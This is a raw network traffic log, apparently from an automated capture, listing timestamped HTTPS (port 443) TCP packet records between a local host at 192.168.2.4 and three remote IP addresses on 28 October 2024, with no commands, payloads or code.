                                                                            Oct 28, 2024 09:37:02.787383080 CET49802443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:02.788903952 CET49803443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:02.788955927 CET4434980313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:02.789048910 CET49803443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:02.789748907 CET49802443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:02.789782047 CET4434980213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:02.790842056 CET49804443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:02.790880919 CET4434980413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:02.790961027 CET49804443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:02.791146040 CET49804443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:02.791163921 CET4434980413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:02.791527987 CET49803443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:02.791574001 CET4434980313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:02.793051004 CET49805443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:02.793092966 CET4434980513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:02.793509960 CET49805443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:02.794047117 CET49805443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:02.794064999 CET4434980513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.083513021 CET44349800104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.085522890 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.097562075 CET49799443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.097593069 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.097635984 CET49800443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.097681999 CET44349800104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.099230051 CET44349800104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.099327087 CET49800443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.100744963 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.100963116 CET49799443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.154927969 CET49799443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.155268908 CET49800443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.155282974 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.155461073 CET44349800104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.158953905 CET49799443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.158998013 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.208668947 CET49799443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.208673954 CET49800443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.208702087 CET44349800104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.254656076 CET49800443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.498224974 CET4434980113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.498785019 CET49801443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.498822927 CET4434980113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.499361038 CET49801443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.499375105 CET4434980113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.516810894 CET4434980413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.517241001 CET49804443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.517317057 CET4434980413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.517636061 CET49804443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.517647982 CET4434980413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.525959015 CET4434980213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.526418924 CET49802443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.526480913 CET4434980213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.526776075 CET49802443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.526791096 CET4434980213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.532952070 CET4434980513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.533262014 CET49805443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.533292055 CET4434980513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.533601046 CET49805443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.533608913 CET4434980513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.536223888 CET4434980313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.536647081 CET49803443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.536686897 CET4434980313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.537086010 CET49803443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.537098885 CET4434980313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.542282104 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.542419910 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.542510033 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.542530060 CET49799443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.542551041 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.542603970 CET49799443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.542623043 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.542728901 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.542895079 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.542948008 CET49799443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.542964935 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.543030024 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.543087006 CET49799443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.543297052 CET49799443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.543323994 CET44349799104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.570221901 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:03.570266008 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:03.570384979 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:03.570607901 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:03.570628881 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:03.592008114 CET49800443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.629285097 CET4434980113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.629477024 CET4434980113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.629581928 CET49801443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.629581928 CET49801443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.629581928 CET49801443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.632976055 CET49811443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.633009911 CET4434981113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.633100986 CET49811443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.633255959 CET49811443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.633284092 CET4434981113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.635356903 CET44349800104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.655122995 CET4434980213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.655265093 CET4434980213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.655344009 CET49802443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.655389071 CET49802443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.655390024 CET49802443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.655416965 CET4434980213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.655442953 CET4434980213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.655625105 CET4434980413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.656096935 CET4434980413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.656172991 CET49804443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.656234980 CET49804443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.656234980 CET49804443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.656271935 CET4434980413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.656297922 CET4434980413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.658128023 CET49812443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.658168077 CET4434981213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.658224106 CET49813443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.658253908 CET49812443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.658266068 CET4434981313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.658325911 CET49813443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.658457041 CET49812443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.658474922 CET4434981213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.658530951 CET49813443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.658560038 CET4434981313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.665121078 CET4434980513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.665266037 CET4434980513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.665323973 CET49805443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.665396929 CET49805443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.665416956 CET4434980513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.665427923 CET49805443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.665433884 CET4434980513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.668092012 CET49814443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.668121099 CET4434981413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.668175936 CET49814443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.668334961 CET49814443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.668350935 CET4434981413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.669981003 CET4434980313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.670159101 CET4434980313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.670422077 CET49803443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.670449018 CET49803443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.670449018 CET49803443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.670468092 CET4434980313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.670480013 CET4434980313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.672353029 CET49815443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.672374964 CET4434981513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.672549963 CET49815443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.672683954 CET49815443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.672705889 CET4434981513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:03.719115973 CET44349800104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.719208956 CET44349800104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.719624043 CET49800443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.720124960 CET49800443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.720150948 CET44349800104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.728827953 CET49816443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.728893042 CET44349816104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.729206085 CET49816443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.729742050 CET49816443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:03.729773045 CET44349816104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:03.928198099 CET49801443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:03.928224087 CET4434980113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.192809105 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.193044901 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.193062067 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.194478989 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.194560051 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.194979906 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.195059061 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.195090055 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.235380888 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.243439913 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.243448973 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.291357994 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.335555077 CET44349816104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:04.335789919 CET49816443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:04.335814953 CET44349816104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:04.335855961 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.335931063 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.335975885 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.335979939 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.335995913 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.336041927 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.336055040 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.336100101 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.336136103 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.336143017 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.336594105 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.336661100 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.336668968 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.337025881 CET44349816104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:04.337084055 CET49816443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:04.337759018 CET49816443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:04.337788105 CET49816443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:04.337817907 CET49816443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:04.337837934 CET44349816104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:04.337887049 CET49816443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:04.338177919 CET49817443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:04.338218927 CET44349817104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:04.338289976 CET49817443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:04.338515997 CET49817443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:04.338524103 CET44349817104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:04.340955019 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.341010094 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.341017962 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.363395929 CET4434981113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.372193098 CET49811443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.372217894 CET4434981113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.373979092 CET49811443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.373990059 CET4434981113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.383709908 CET4434981213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.389069080 CET49812443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.389101982 CET4434981213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.390031099 CET49812443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.390048981 CET4434981213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.394788980 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.402533054 CET4434981513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.403142929 CET49815443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.403162956 CET4434981513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.403770924 CET4434981313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.404428005 CET49815443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.404433012 CET4434981513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.405421972 CET49813443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.405431986 CET4434981313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.406883955 CET49813443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.406888008 CET4434981313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.408591032 CET4434981413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.409462929 CET49814443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.409497023 CET4434981413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.418910027 CET49814443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.418931007 CET4434981413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.455538034 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.455712080 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.455749989 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.455758095 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.455770969 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.455822945 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.456511974 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.456587076 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.456629038 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.456639051 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.456707954 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.456752062 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.456762075 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.500952005 CET4434981113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.501033068 CET4434981113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.501099110 CET49811443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.502722979 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.502732038 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.514947891 CET4434981213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.515157938 CET4434981213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.515239954 CET49812443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.530109882 CET49811443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.530143023 CET4434981113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.531290054 CET4434981513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.531539917 CET4434981513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.531598091 CET49815443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.532994986 CET49815443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.533010006 CET4434981513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.533020973 CET49815443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.533025026 CET4434981513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.534737110 CET49812443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.534765959 CET4434981213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.534785986 CET49812443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.534796000 CET4434981213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.536570072 CET4434981313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.536710978 CET4434981313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.536768913 CET49813443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.545330048 CET49813443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.545335054 CET4434981313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.548300982 CET4434981413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.548494101 CET4434981413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.548552990 CET49814443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.551434040 CET49814443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.551455975 CET4434981413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.552428007 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.555708885 CET49818443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.555802107 CET4434981813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.555897951 CET49818443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.556616068 CET49819443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.556648970 CET49820443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.556694984 CET4434982013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.556704998 CET4434981913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.556757927 CET49820443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.556794882 CET49819443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.558358908 CET49821443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.558423996 CET4434982113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.558509111 CET49821443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.559350014 CET49821443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.559385061 CET4434982113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.559752941 CET49818443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.559792042 CET4434981813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.560724020 CET49820443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.560745001 CET4434982013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.560904980 CET49819443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.560946941 CET4434981913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.564836025 CET49822443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.564848900 CET4434982213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.564912081 CET49822443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.565804005 CET49822443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:04.565824032 CET4434982213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:04.575495958 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.575572968 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.575609922 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.575623035 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.575665951 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.575717926 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.575726986 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.575934887 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.575979948 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.575988054 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.576119900 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.576158047 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.576164961 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.576782942 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.576828003 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.576833963 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.629234076 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.629245043 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.676034927 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.695399046 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.695573092 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.695616961 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.695630074 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.695920944 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.695955038 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.695964098 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.696014881 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.696054935 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.696062088 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.696774960 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.696818113 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.696825027 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.738694906 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.815608025 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.815623999 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.815668106 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.815677881 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.815696001 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.815723896 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.815742016 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.815876961 CET44349807104.17.25.14192.168.2.4
